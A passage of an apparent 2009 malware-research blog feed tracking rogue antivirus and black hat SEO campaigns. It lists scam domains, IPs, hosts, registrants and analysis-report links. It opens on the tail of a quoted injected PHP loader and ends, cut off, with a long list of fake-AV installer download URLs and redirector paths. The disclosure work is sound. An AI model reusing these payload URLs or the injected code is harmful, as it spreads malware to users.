'tmp_lkojfghx2') &lt;br /&gt;$GLOBALS['tmp_xhgfjokl'] = $a; &lt;br /&gt;tmp_lkojfghx2(); &lt;br /&gt;?&amp;gt; &lt;br /&gt;&lt;br /&gt;with colors:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdZVX1tYjtI/AAAAAAAAAVw/d4Dfcg_W9iI/s1600-h/php-code-injected.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 166px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdZVX1tYjtI/AAAAAAAAAVw/d4Dfcg_W9iI/s320/php-code-injected.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320533877827604178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.google.com/search?hl=en&amp;amp;q=%22tmp_lkojfghx%22" target="_blank"&gt;Google search&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;      &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-6444620241046296227?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/6444620241046296227'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/6444620241046296227'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html' title='Black Hat SEO and Rogue Antivirus p.5'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_9YOi_bjoDL4/SdZV8fn9CeI/AAAAAAAAAV4/m8RiK0R6vno/s72-c/PDF1.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-6301720267452397866</id><published>2009-04-03T03:37:00.000-07:00</published><updated>2009-04-03T04:00:16.811-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Netelligent Hosting Services Inc'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website rogue antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='initialsecurityscan.com'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='winwebsecurity'/><title type='text'>Black Hat SEO and Rogue Antivirus p.6</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;Analyzing the tactic&lt;br /&gt;&lt;/p&gt;&lt;table width="549" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="549"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;  Yet another WinWebSecurity variant this one through crack/serial websites and ad network &lt;br /&gt;&lt;br /&gt;Fake ad:&lt;br /&gt;&lt;i&gt;BE PROTECTED! - FREE online system scan for viruses, trojans and malware. &lt;br /&gt;Check it out - maybe someone have access to your PC right now! Protect yourself.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Which result in a complete set of redirection&lt;br /&gt;&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=8bd407705e77d4149c2d8eeeb4a90624&amp;amp;t=1238754157&amp;amp;type=js" target="_blank"&gt;Redirection 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=be40e167ad6c26b527ee75aad00e64fe&amp;amp;t=1238754213&amp;amp;type=js" target="_blank"&gt;Redirection 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=90186e983d193ade0128afc248ea596b&amp;amp;t=1238754257&amp;amp;type=js" target="_blank"&gt;Redirection 3&lt;/a&gt;  &lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=c6f5e7d7eeb0ffcc39f9084a69220f37&amp;amp;t=1238754295&amp;amp;type=js" target="_blank"&gt;Redirection 4&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;then&lt;br /&gt;&lt;br /&gt;initialsecurityscan.com&lt;br /&gt;&lt;br /&gt;Retreived from google cache &lt;a href="http://209.85.229.132/search?q=cache:6dAQ_gk8K8kJ:filecourse.net/file-search-tube%2B8porno-1-full-version-with-crack-rapidshare-links.html+%22Check+it+out+-+maybe+someone+have+access+to+your+PC%22&amp;amp;cd=10&amp;amp;hl=en&amp;amp;ct=clnk" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/435fe8b2c2efcc6c268cf922927722d7" target="_blank"&gt;VirusTotal&lt;/a&gt;&lt;br /&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=27C85C042834ACA4A88A01B1F2D26C00E41566C1" target="_blank"&gt;Prevx&lt;/a&gt;&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=18bd3ce55e3d94044d936bf1956b3e506" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;File install.exe received on 04.03.2009 12:28:53 (CET)&lt;br /&gt;Result: 18/39 (46.16%)  &lt;br /&gt;&lt;br /&gt;File info:&lt;br /&gt;&lt;br /&gt;File size: 108584 bytes&lt;br /&gt;MD5: de926b63ab0976244d752170dac7ec00 &lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by Netelligent Hosting Services Inc&lt;/u&gt; on the IP 209.44.126.14&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Screenshot on Friday April 3&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXobeBvXTI/AAAAAAAAAVo/fLFWMKnxRrY/s1600-h/initialsecurityscan.com-ad-SCAM.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 231px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXobeBvXTI/AAAAAAAAAVo/fLFWMKnxRrY/s320/initialsecurityscan.com-ad-SCAM.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320414093422583090" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXnWfN_2BI/AAAAAAAAAVg/FCiQ6E5dVNA/s1600-h/initialsecurityscan.com-SCAM.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 202px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXnWfN_2BI/AAAAAAAAAVg/FCiQ6E5dVNA/s320/initialsecurityscan.com-SCAM.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320412908331456530" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Using NS1.FUCKMONEYCASH.COM and NS2.FUCKMONEYCASH.COM as DNS Servers&lt;br /&gt;No whois info -  PrivacyProtect.org&lt;br /&gt;Registrar:     DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM&lt;br /&gt;Dates: Created 01-apr-2009&lt;br /&gt;Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.&lt;br /&gt;    &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-6301720267452397866?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/6301720267452397866'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/6301720267452397866'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p6.html' title='Black Hat SEO and Rogue Antivirus p.6'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_9YOi_bjoDL4/SdXobeBvXTI/AAAAAAAAAVo/fLFWMKnxRrY/s72-c/initialsecurityscan.com-ad-SCAM.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-7486404152711641640</id><published>2009-04-02T08:59:00.000-07:00</published><updated>2009-04-03T09:17:04.362-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='zlkon'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='activesecurityshield.com'/><category scheme='http://www.blogger.com/atom/ns#' term='UK2 GROUP LTD'/><category scheme='http://www.blogger.com/atom/ns#' term='netdirekt ek'/><category scheme='http://www.blogger.com/atom/ns#' term='Eurohost LLC'/><category scheme='http://www.blogger.com/atom/ns#' term='Eurohost'/><category scheme='http://www.blogger.com/atom/ns#' term='getsecuritywall.com'/><title type='text'>Black Hat SEO and Rogue Antivirus p.4</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;Full of rogues&lt;br /&gt;&lt;/p&gt;&lt;table width="549" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="549"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;br /&gt;This is just a sample of websites  found in the previous days which are still running.&lt;br /&gt;(with some ThreatExpert or VirusTotal reports)&lt;br /&gt;  
 &lt;br /&gt;  Site running on these IPs can also be found on this blog and several other  forums.&lt;br /&gt;  &lt;br /&gt;  &lt;u&gt;Hosted by Netelligent Hosting Services Inc&lt;/u&gt; on the IP 209.44.126.14&lt;br /&gt;&lt;br /&gt;activesecurityshield.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=6c910d7cfbf58a1e0a5eac333233c218"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;bestsecurityupdate.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=87446e69f49bc886c68a69aef77f9321" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;getscanonline.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=6fa85eac516c811961b392c9ae7cb5c4" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;getsecuritywall.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=e267f911190450d30361d44a9826c06b" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;scanalertspage.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=1b7b9362d9082185dc2d571d55485405" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;scanbaseonline.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=3328fefcf49eaec404a153981c1a55d4" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;onlinescandetect.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=49497dd211eb9285bef8dc2787b8665a" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;runpcscannow.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=6b33b576e1a1920d7ff8504f00d405f6" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;yourstabilitysystem.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=b854b838003746b4b36013a2306ef595" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;
 websecuritymaster.com -  &lt;a href="http://www.threatexpert.com/report.aspx?md5=4d395e9476dffb6e430c676984569f40" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;websecurityvoice.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=41e497f7a2e417716274e4453a902fa0" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
 &lt;u&gt;Hosted by Layered Technologies, Inc&lt;/u&gt; on the IP 72.233.34.6&lt;br /&gt;&lt;br /&gt;zpmuwbtqqwkw.net&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by ZlKon&lt;/u&gt; on the IP 94.247.3.3&lt;br /&gt;&lt;br /&gt;greatvirusscan.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=69337deb113935e3eff3a159b843d661" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;webprotectionscan.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=f5ad7190cce9aca773b91d251f2b2477" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by ZlKon&lt;/u&gt; on the IP 94.247.3.74&lt;br /&gt;&lt;br /&gt;onlinescandetect.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=6a6e18e2da6748c1c7d4fbc8914e3695" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by Eurohost LLC&lt;/u&gt; on the IP 91.212.65.55&lt;br /&gt;&lt;br /&gt;securityscanguide.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=69337deb113935e3eff3a159b843d661" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by UK2 GROUP LTD&lt;/u&gt; using resellermatrix on the IP 66.197.154.198&lt;br /&gt;other info:&lt;br /&gt;netname: HOSTNOC-2BLK&lt;br /&gt;AS21788 - BurstNet Technologies, Inc.&lt;br /&gt;route: 66.197.128.0/17&lt;br /&gt;canonical name for 66.197.154.198: ip.ipdatacenter.net&lt;br /&gt;&lt;br /&gt; megascan6.com&lt;br /&gt;nowscan6.com &lt;br /&gt; scanline6.com&lt;br /&gt;scan6just.com&lt;br /&gt;scan6log.com&lt;br /&gt;scan6main.com&lt;br /&gt;scan6now.com&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by netdirekt e.K.&lt;/u&gt; on the IP 89.149.241.134&lt;br /&gt;&lt;br /&gt;desktopprepairpackage.com&lt;br /&gt;pcantimalwaresolution.com&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by Ecatel LTD&lt;/u&gt; on the IP 91.212.65.55 [AS29073]&lt;br /&gt;&lt;br /&gt;securityscanguide.com - &lt;a href="http://www.threatexpert.com/report.aspx?md5=69337deb113935e3eff3a159b843d661" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Hosted by netdirekt e.K&lt;/u&gt;. on the IP 89.149.241.134&lt;br /&gt;also use 94.102.51.14 by Ecatel Network&lt;br /&gt;&lt;br /&gt;comdwnld.com&lt;br /&gt;desktopprepairpackage.com &lt;br /&gt;pcantimalwaresolution.com&lt;br /&gt;removespywarethreats.com&lt;br /&gt;securecleanersolution.com&lt;br /&gt;securecleanertool.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Another interesting link on&lt;i&gt;&amp;quot;evenmorestats.com&amp;quot;&lt;/i&gt; leads to a collection of SCAM sites&lt;br /&gt;&lt;br /&gt;    &lt;/p&gt;    &lt;table width="565" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="165"&gt;cleanerpcsolution.com&lt;/td&gt;&lt;td width="119"&gt;89.149.241.134&lt;/td&gt;&lt;td width="281"&gt;AS28753 - NETDIRECT Frankfurt, DE&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;malwareremovingtool.com&lt;/td&gt;&lt;td&gt;89.149.241.134&lt;/td&gt;&lt;td&gt;AS28753 - NETDIRECT Frankfurt, DE&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;pcantimalwaresolution.com&lt;/td&gt;&lt;td&gt;89.149.241.134&lt;/td&gt;&lt;td&gt; AS28753 - NETDIRECT Frankfurt, DE&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;removespywarethreats.com&lt;/td&gt;&lt;td&gt;89.149.241.134&lt;/td&gt;&lt;td&gt; AS28753 - NETDIRECT Frankfurt, DE&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;securecleanersolution.com&lt;/td&gt;&lt;td&gt;89.149.241.134&lt;/td&gt;&lt;td&gt;AS28753 - NETDIRECT Frankfurt, DE&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;securecleanertool.com&lt;/td&gt;&lt;td&gt;89.149.241.134&lt;/td&gt;&lt;td&gt;AS28753 - NETDIRECT Frankfurt, DE&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;comdwnld.com&lt;/td&gt;&lt;td&gt;94.102.51.14&lt;/td&gt;&lt;td&gt;AS29073 -  Ecatel Network&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;evenmorestats.com&lt;/td&gt;&lt;td&gt;84.243.252.160&lt;/td&gt;&lt;td&gt;AS16131 - GrafiX Internet B.V.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;go-uniq.com&lt;/td&gt;&lt;td&gt;72.55.153.155&lt;/td&gt;&lt;td&gt;AS32613 -  iWeb Technologies Inc.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;mydwnld.com&lt;/td&gt;&lt;td&gt;88.198.8.15 &lt;/td&gt;&lt;td&gt;AS24940 - Hetzner Online AG RZ-Nuernberg &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;promotion-offer.com&lt;/td&gt;&lt;td&gt;88.198.233.225&lt;/td&gt;&lt;td&gt;AS24940 - Hetzner Online AG RZ-Nuernberg &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;traff-direct.com&lt;/td&gt;&lt;td&gt;78.129.158.69 &lt;/td&gt;&lt;td&gt;AS29131 - RapidSwitch Ltd&lt;/td&gt;&lt;/tr&gt;    &lt;/table&gt;    &lt;br /&gt;    &lt;table width="565" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="165"&gt;comdwnld.com&lt;/td&gt;&lt;td width="119"&gt;94.102.51.14&lt;/td&gt;&lt;td width="281"&gt;AS29073 -  Ecatel Network&lt;/td&gt;&lt;/tr&gt;    &lt;/table&gt;    &lt;br /&gt;The first sixst used 89.149.241.134 and 94.102.51.14&lt;br /&gt;&lt;br /&gt;Some of them are registered using &amp;quot;Nexton Limited&amp;quot; as registrant but a search on google also reveal no&lt;br /&gt;entries apart frompornography and malware sites. &lt;br /&gt;And several other using &amp;quot;Preston Wasson&amp;quot; wassonpreston@email.com&lt;br /&gt;&lt;br /&gt;Some common DNS actively used (several other will not be added to this page)&lt;br /&gt;&lt;br /&gt;with ENOM, INC. as registar: &lt;br /&gt;ns1.comondns.com  [58.65.233.33] - AS10026 - ANC Asia Netcom Corporation&lt;br /&gt;ns2.comondns.com  [58.65.233.33] - AS10026 - ANC Asia Netcom Corporation &lt;br /&gt;ns3.comondns.com  [89.149.227.248] - AS28753 - NETDIRECT AS NETDIRECT Frankfurt, DE&lt;br /&gt;ns4.comondns.com  [79.135.168.112] - AS44097 - SNETTELECOM-AS Sistemnet Telekomunikasyon &lt;br /&gt;ns5.comondns.com  [79.135.168.112] - AS44097 - SNETTELECOM-AS Sistemnet Telekomunikasyon&lt;br /&gt;&lt;br /&gt;with DIRECTI INTERNET SOLUTIONS PVT. LTD. as registrar: &lt;br /&gt;ns1.gonsset.com [94.102.51.14]&lt;br /&gt;ns1.gonsset.com [89.149.227.248] &lt;br /&gt;&lt;br /&gt;Previous IPs, netblock, WHOIS info and other domain can be retreived on the &lt;br /&gt;msmvps spyware sucks blog &lt;a href="http://msmvps.com/blogs/spywaresucks/archive/2009/03/11/1677438.aspx" target="_blank"&gt;here&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Redirectors are: evenmorestats.com/in.cgi?6 - go-uniq.com/in.cgi?13&amp;amp;gai=cspamg&amp;amp;gli=79 (&lt;a href="http://wepawet.iseclab.org/view.php?hash=36112599c25f12ae29da3d9aac726ad6&amp;amp;t=1238728358&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;comdwnld.com has a  collection of rogue security software which serve for several other sites:&lt;br /&gt;&lt;br /&gt;Some detections: &lt;a href="http://www.virustotal.com/analisis/30e27d455e81d8d6d9322674f91c4434" target="_blank"&gt;Trojan FakeSpyGuard&lt;/a&gt;, &lt;a href="http://www.virustotal.com/analisis/1e87e3d0b1fc4ca9709bc17104d44f61" target="_blank"&gt;Adware VirusRemover&lt;/a&gt;, &lt;a href="http://www.virustotal.com/analisis/95ed3cacca2007dc7fb354329e6275d5" target="_blank"&gt;WinAntiVirus2008&lt;/a&gt;, &lt;a href="http://www.virustotal.com/analisis/bab606f85c06bf4c83205831d702e547" target="_blank"&gt;Trojan Hiloti&lt;/a&gt;, &lt;a href="http://www.virustotal.com/analisis/f86f36f74d72e5f7ca0e39ce12221d93" target="_blank"&gt;SpywareRemover2009&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;comdwnld.com/AntiMalwareGuard_Paid_Rezer.exe&lt;br /&gt;comdwnld.com/SpywareRemover2009_Installer_Dual_Rezer_en.exe &lt;br /&gt;comdwnld.com/VirusRemover2008_Setup_Paid_Rezer_en.exe&lt;br /&gt;comdwnld.com/AntiMalwareGuard/1.0.36.0/AMGFreeUpdate_Rezer.exe&lt;br /&gt;comdwnld.com/AntiMalwareSuite/4.1.233.1/AMSFreeUpdate_Rezer.exe&lt;br /&gt;comdwnld.com/AntiMalwareSuite/4.1.233.1/AMSFreeUpdate_Rezer_qrt.exe &lt;br /&gt;comdwnld.com/SpywareRemover2009.com/SpywareRemover2009_Installer_Paid_Rezer_en.exe&lt;br /&gt;comdwnld.com/SpywareRemover2009.com/SpywareRemover2009_Setup_Dual_Rezer_en.exe&lt;br /&gt;comdwnld.com/antimalwaresuite2009.com/AMS_FullInstaller_Rezer.exe &lt;br /&gt;comdwnld.com/bestvirusremover2009.com/1.0.3.1/FreeApp%20_Rezer.exe&lt;br /&gt;comdwnld.com/bestvirusremover2009.com/1.0.3.1/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/bestvirusremover2009.com/1.0.3.1/FreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/bestvirusremover2009.com/1.0.6.0/FreeApp%20_Rezer.exe&lt;br /&gt;comdwnld.com/bestvirusremover2009.com/1.0.6.0/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/bestvirusremover2009.com/1.0.6.0/FreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/bestvirusremover2009.com/virusremover2009_setup_paid_rezer_en.exe&lt;br /&gt;comdwnld.com/cleaner2009pro.com/1.0.18.0/CLNFreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/cleaner2009pro.com/1.0.18.0/CLNFreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/cleaner2009pro.com/CLN_2009FullInstall_Rezer.exe&lt;br /&gt;comdwnld.com/nss_downloads/AntiMalwareGF_Rezer.exe&lt;br /&gt;comdwnld.com/nss_downloads/VirusRemover2008_Setup_Free_Rezer_en.exe&lt;br /&gt;comdwnld.com/nss_downloads/SpywareRemover2009.com/SpywareRemover2009_Installer_Dual_Rezer_en.exe&lt;br /&gt;comdwnld.com/nss_downloads/SpywareRemover2009.com/SpywareRemover2009_Installer_Dual_br1_en.exe&lt;br /&gt;comdwnld.com/nss_downloads/SpywareRemover2009.com/SpywareRemover2009_Installer_Paid_br1_en.exe&lt;br /&gt;comdwnld.com/nss_downloads/antimalwaresuite2009.com/AMS_FreeInstaller_Rezer.exe&lt;br /&gt;comdwnld.com/nss_downloads/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe&lt;br /&gt;comdwnld.com/nss_downloads/cleaner2009pro.com/CLN_2009FreeInstall_Rezer.exe&lt;br /&gt;comdwnld.com/nss_downloads/secureexpertcleaner.com/SecureExpertCleaner_Dual_Rezer_En.exe&lt;br /&gt;comdwnld.com/nss_downloads/secureexpertcleaner.com/SecureExpertCleaner_Dual_br1_En.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/SecureExpertCleaner_Paid_Rezer_En.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/SecureExpertCleaner_Paid_br1_En.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/1.0.18.3/SECFreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/1.0.18.3/SECFreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/1.0.18.5/SECFreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/1.0.18.5/SECFreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/1.0.18.6/SECFreeApp_br1.exe&lt;br /&gt;comdwnld.com/secureexpertcleaner.com/1.0.18.6/SECFreeApp_br1_qrt.exe&lt;br /&gt;comdwnld.com/virusremover2008.com/1.0.3.1/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/virusremover2008.com/1.0.3.1/FreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/virusremover2008.com/1.0.6.0/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/virusremover2008.com/1.0.6.0/FreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/virusremover2009.com/1.0.3.1/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/virusremover2009.com/1.0.3.1/FreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/virusremover2009.com/1.0.6.0/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/virusremover2009.com/1.0.6.0/FreeApp_Rezer_qrt.exe&lt;br /&gt;comdwnld.com/virusremover2009.com/1.0.8.0/FreeApp_Rezer.exe&lt;br /&gt;comdwnld.com/virusremover2009.com/1.0.8.0/FreeApp_Rezer_qrt.exe &lt;br 